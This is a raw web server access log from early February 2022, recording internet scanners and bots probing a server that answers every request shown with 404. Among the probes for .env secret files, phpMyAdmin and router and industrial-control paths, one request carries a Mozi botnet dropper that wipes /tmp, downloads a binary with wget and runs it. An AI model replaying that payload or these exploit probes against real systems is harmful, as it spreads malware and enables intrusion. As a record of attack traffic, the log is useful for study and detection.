GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 373/440] 128.14.209.162 () {34 vars in 488 bytes} [Thu Feb 3 04:32:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 374/441] 83.97.20.34 () {30 vars in 329 bytes} [Thu Feb 3 04:33:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 375/442] 81.196.154.166 () {32 vars in 471 bytes} [Thu Feb 3 04:39:41 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 376/443] 64.227.112.120 () {36 vars in 529 bytes} [Thu Feb 3 06:29:19 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 377/444] 64.227.112.120 () {36 vars in 551 bytes} [Thu Feb 3 06:29:19 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 378/445] 62.171.132.199 () {40 vars in 672 bytes} [Thu Feb 3 06:39:04 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 46/446] 83.97.20.34 () {26 vars in 287 bytes} [Thu Feb 3 06:48:24 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 379/447] 183.136.225.56 () {34 vars in 456 bytes} [Thu Feb 3 07:16:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 380/448] 78.189.127.69 () {34 vars in 642 bytes} [Thu Feb 3 07:23:09 2022] GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 381/449] 128.1.248.42 () {34 vars in 486 bytes} [Thu Feb 3 07:46:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 382/450] 136.144.41.117 () {40 vars in 568 bytes} [Thu Feb 3 10:05:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 383/451] 194.49.68.118 () {36 vars in 523 bytes} [Thu Feb 3 10:08:18 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 384/452] 194.49.68.118 () {40 vars in 630 bytes} [Thu Feb 3 10:08:18 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 385/453] 40.113.5.119 () {36 vars in 588 bytes} [Thu Feb 3 10:15:15 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 386/454] 40.113.5.119 () {40 vars in 695 bytes} [Thu Feb 3 10:15:16 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 387/455] 83.97.20.34 () {30 vars in 329 bytes} [Thu Feb 3 10:49:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 388/456] 20.124.229.98 () {36 vars in 523 bytes} [Thu Feb 3 11:43:28 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 389/457] 20.124.229.98 () {40 vars in 630 bytes} [Thu Feb 3 11:43:28 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 390/458] 81.39.100.157 () {34 vars in 392 bytes} [Thu Feb 3 11:58:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 391/459] 83.97.20.34 () {26 vars in 287 bytes} [Thu Feb 3 12:41:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 392/460] 109.237.103.123 () {36 vars in 525 bytes} [Thu Feb 3 13:54:39 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 393/461] 128.14.134.134 () {34 vars in 488 bytes} [Thu Feb 3 14:29:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 394/462] 34.140.248.32 () {42 vars in 561 bytes} [Thu Feb 3 14:43:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 395/463] 109.237.103.9 () {36 vars in 523 bytes} [Thu Feb 3 14:55:40 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 396/464] 173.225.110.122 () {34 vars in 519 bytes} [Thu Feb 3 15:21:34 2022] GET /login.cgi.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 397/465] 45.95.169.102 () {40 vars in 567 bytes} [Thu Feb 3 15:40:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 398/466] 69.61.242.98 () {36 vars in 522 bytes} [Thu Feb 3 15:55:59 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 399/467] 69.61.242.98 () {40 vars in 629 bytes} [Thu Feb 3 15:56:00 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 400/468] 83.97.20.34 () {30 vars in 329 bytes} [Thu Feb 3 16:22:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 401/469] 2.57.121.59 () {34 vars in 400 bytes} [Thu Feb 3 16:47:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 402/470] 103.203.58.4 () {30 vars in 346 bytes} [Thu Feb 3 18:26:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 403/471] 83.97.20.34 () {26 vars in 287 bytes} [Thu Feb 3 18:59:02 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 404/472] 2.57.121.59 () {34 vars in 400 bytes} [Thu Feb 3 19:26:23 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 405/473] 132.145.39.16 () {34 vars in 438 bytes} [Thu Feb 3 19:35:04 2022] GET /contact => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 406/474] 132.145.39.16 () {34 vars in 448 bytes} [Thu Feb 3 19:35:04 2022] GET /contact.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 407/475] 132.145.39.16 () {34 vars in 446 bytes} [Thu Feb 3 19:35:05 2022] GET /contact.htm => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 408/476] 132.145.39.16 () {34 vars in 446 bytes} [Thu Feb 3 19:35:05 2022] GET /contact.jsp => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 409/477] 132.145.39.16 () {34 vars in 448 bytes} [Thu Feb 3 19:35:06 2022] GET /contact.json => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 410/478] 132.145.39.16 () {34 vars in 446 bytes} [Thu Feb 3 19:35:06 2022] GET /contact.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 411/479] 132.145.39.16 () {34 vars in 458 bytes} [Thu Feb 3 19:35:07 2022] GET /subscription.json => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19140|app: 0|req: 1/480] 132.145.39.16 () {34 vars in 446 bytes} [Thu Feb 3 19:35:07 2022] GET /contact.xml => generated 179 bytes in 238 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 412/481] 209.141.62.219 () {34 vars in 479 bytes} [Thu Feb 3 21:18:49 2022] POST /servlet/~ic/bsh.servlet.BshServlet => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 47/482] 222.186.19.235 () {30 vars in 527 bytes} [Thu Feb 3 21:23:43 2022] GET http://fuwu.sogou.com/404/index.html => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 413/483] 222.186.19.235 () {30 vars in 509 bytes} [Thu Feb 3 21:23:43 2022] GET http://fuwu.sogou.com/404/index.html => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 414/484] 109.237.103.38 () {36 vars in 524 bytes} [Thu Feb 3 21:57:24 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 415/485] 83.97.20.34 () {30 vars in 328 bytes} [Thu Feb 3 22:12:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 416/486] 1.13.189.96 () {34 vars in 367 bytes} [Thu Feb 3 23:02:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 417/487] 83.97.20.34 () {26 vars in 287 bytes} [Fri Feb 4 00:34:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 418/488] 47.103.5.130 () {34 vars in 425 bytes} [Fri Feb 4 00:37:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 419/489] 101.132.111.218 () {34 vars in 461 bytes} [Fri Feb 4 00:44:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 420/490] 193.118.53.194 () {34 vars in 488 bytes} [Fri Feb 4 00:45:24 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 421/491] 47.102.98.20 () {40 vars in 601 bytes} [Fri Feb 4 01:31:57 2022] GET /index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 422/492] 47.102.98.20 () {38 vars in 594 bytes} [Fri Feb 4 01:31:57 2022] GET /phpmyadmin/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.119 client_port: 7676] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 423/493] 116.233.200.101 () {26 vars in 299 bytes} [Fri Feb 4 02:06:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 424/494] 116.233.200.101 () {26 vars in 299 bytes} [Fri Feb 4 02:06:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 48/495] 116.233.200.101 () {30 vars in 341 bytes} [Fri Feb 4 02:06:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 49/496] 116.233.200.101 () {30 vars in 341 bytes} [Fri Feb 4 02:06:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 18/497] 116.233.200.101 () {30 vars in 341 bytes} [Fri Feb 4 02:06:12 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 425/498] 116.233.200.101 () {42 vars in 799 bytes} [Fri Feb 4 02:06:12 2022] POST /cgi-bin/luci/;stok=/locale?form=lang => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 2/499] 116.233.200.101 () {30 vars in 371 bytes} [Fri Feb 4 02:06:12 2022] GET /navigation.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 426/500] 116.233.200.101 () {30 vars in 341 bytes} [Fri Feb 4 02:06:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 427/501] 116.233.200.101 () {30 vars in 341 bytes} [Fri Feb 4 02:06:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 3/502] 116.233.200.101 () {30 vars in 424 bytes} [Fri Feb 4 02:06:12 2022] GET /fx_plcinf.html?CMD=Monitor%20Start&LANG=EN => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 4/503] 116.233.200.101 () {30 vars in 367 bytes} [Fri Feb 4 02:06:12 2022] GET /ifixwebspace/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 428/504] 116.233.200.101 () {30 vars in 365 bytes} [Fri Feb 4 02:06:13 2022] GET /KingViewWeb/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 429/505] 116.233.200.101 () {30 vars in 367 bytes} [Fri Feb 4 02:06:13 2022] GET /webconfig.ini => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 430/506] 65.49.20.69 () {28 vars in 305 bytes} [Fri Feb 4 02:06:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 431/507] 167.248.133.62 () {28 vars in 311 bytes} [Fri Feb 4 02:32:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 432/508] 167.248.133.62 () {34 vars in 443 bytes} [Fri Feb 4 02:32:21 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 433/509] 62.171.132.199 () {40 vars in 672 bytes} [Fri Feb 4 02:47:53 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 434/510] 209.17.97.2 () {30 vars in 408 bytes} [Fri Feb 4 03:09:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 435/511] 136.144.41.117 () {40 vars in 568 bytes} [Fri Feb 4 03:13:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 436/512] 47.101.46.78 () {34 vars in 430 bytes} [Fri Feb 4 03:35:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 437/513] 83.97.20.34 () {30 vars in 329 bytes} [Fri Feb 4 04:06:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 438/514] 67.245.203.235 () {32 vars in 488 bytes} [Fri Feb 4 04:10:56 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 439/515] 143.198.23.33 () {32 vars in 439 bytes} [Fri Feb 4 04:50:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 440/516] 192.241.204.132 () {34 vars in 423 bytes} [Fri Feb 4 05:24:25 2022] GET /portal/redlion => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 441/517] 192.241.212.44 () {34 vars in 424 bytes} [Fri Feb 4 05:32:59 2022] GET /actuator/health => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 442/518] 192.241.198.217 () {34 vars in 407 bytes} [Fri Feb 4 06:03:10 2022] GET /hudson => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 443/519] 109.203.183.134 () {32 vars in 465 bytes} [Fri Feb 4 06:19:41 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 444/520] 83.97.20.34 () {26 vars in 286 bytes} [Fri Feb 4 06:46:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 445/521] 62.171.132.199 () {40 vars in 672 bytes} [Fri Feb 4 07:09:57 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 50/522] 193.118.53.210 () {34 vars in 488 bytes} [Fri Feb 4 07:37:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 446/523] 84.22.139.90 () {32 vars in 462 bytes} [Fri Feb 4 08:26:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 447/524] 104.206.128.2 () {30 vars in 372 bytes} [Fri Feb 4 09:16:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 448/525] 192.241.205.24 () {34 vars in 394 bytes} [Fri Feb 4 09:40:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 449/526] 14.203.222.226 () {30 vars in 437 bytes} [Fri Feb 4 10:15:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 450/527] 83.97.20.34 () {30 vars in 328 bytes} [Fri Feb 4 10:15:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 451/528] 62.171.132.199 () {40 vars in 672 bytes} [Fri Feb 4 11:15:06 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 452/529] 161.189.192.94 () {40 vars in 725 bytes} [Fri Feb 4 12:05:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 453/530] 104.131.59.66 () {36 vars in 481 bytes} [Fri Feb 4 12:40:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 454/531] 103.29.68.35 () {32 vars in 409 bytes} [Fri Feb 4 13:03:13 2022] GET /nmaplowercheck1643979793 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 455/532] 103.29.68.35 () {32 vars in 371 bytes} [Fri Feb 4 13:03:13 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 456/533] 195.189.248.130 () {32 vars in 465 bytes} [Fri Feb 4 13:03:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 51/534] 136.144.41.117 () {40 vars in 568 bytes} [Fri Feb 4 13:07:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 457/535] 34.140.248.32 () {42 vars in 564 bytes} [Fri Feb 4 14:32:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 458/536] 47.99.168.169 () {34 vars in 457 bytes} [Fri Feb 4 14:54:45 2022] GET /hunmj_serverApi/test.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 459/537] 117.248.249.228 () {32 vars in 472 bytes} [Fri Feb 4 15:05:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 460/538] 83.97.20.34 () {30 vars in 329 bytes} [Fri Feb 4 16:42:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 461/539] 136.144.41.117 () {40 vars in 568 bytes} [Fri Feb 4 17:38:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 462/540] 209.17.97.106 () {30 vars in 410 bytes} [Fri Feb 4 18:16:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 463/541] 165.232.187.10 () {36 vars in 554 bytes} [Fri Feb 4 18:37:49 2022] GET /system_api.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 464/542] 165.232.187.10 () {36 vars in 550 bytes} [Fri Feb 4 18:37:49 2022] GET /c/version.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 465/543] 165.232.187.10 () {36 vars in 578 bytes} [Fri Feb 4 18:37:50 2022] GET /streaming/clients_live.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 466/544] 165.232.187.10 () {36 vars in 580 bytes} [Fri Feb 4 18:37:50 2022] GET /stalker_portal/c/version.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 467/545] 165.232.187.10 () {36 vars in 552 bytes} [Fri Feb 4 18:37:51 2022] GET /stream/live.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 468/546] 165.232.187.10 () {36 vars in 550 bytes} [Fri Feb 4 18:37:51 2022] GET /flu/403.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 52/547] 165.232.187.10 () {36 vars in 526 bytes} [Fri Feb 4 18:37:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 19/548] 83.97.20.34 () {26 vars in 287 bytes} [Fri Feb 4 18:37:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 469/549] 20.151.201.9 () {32 vars in 447 bytes} [Fri Feb 4 19:03:57 2022] GET /cgi-bin/luci => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 470/550] 162.142.125.210 () {30 vars in 402 bytes} [Fri Feb 4 19:45:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 53/551] 162.142.125.210 () {22 vars in 236 bytes} [Fri Feb 4 19:45:49 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 471/552] 167.94.138.47 () {34 vars in 442 bytes} [Fri Feb 4 19:47:42 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 472/553] 178.159.40.209 () {32 vars in 471 bytes} [Fri Feb 4 20:28:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 473/554] 91.236.239.224 () {36 vars in 493 bytes} [Fri Feb 4 21:27:17 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 474/555] 91.236.239.224 () {38 vars in 527 bytes} [Fri Feb 4 21:27:18 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 475/556] 83.97.20.34 () {30 vars in 329 bytes} [Fri Feb 4 21:48:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 54/557] 185.244.164.69 () {34 vars in 437 bytes} [Fri Feb 4 22:20:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 476/558] 167.94.138.62 () {34 vars in 442 bytes} [Fri Feb 4 22:34:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 20/559] 167.94.138.117 () {30 vars in 401 bytes} [Fri Feb 4 22:34:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 477/560] 167.94.138.117 () {22 vars in 235 bytes} [Fri Feb 4 22:34:37 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 478/561] 161.97.106.237 () {40 vars in 629 bytes} [Fri Feb 4 23:10:03 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 479/562] 174.63.153.17 () {28 vars in 307 bytes} [Fri Feb 4 23:13:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 480/563] 109.237.103.9 () {36 vars in 523 bytes} [Fri Feb 4 23:58:53 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 481/564] 83.97.20.34 () {26 vars in 287 bytes} [Sat Feb 5 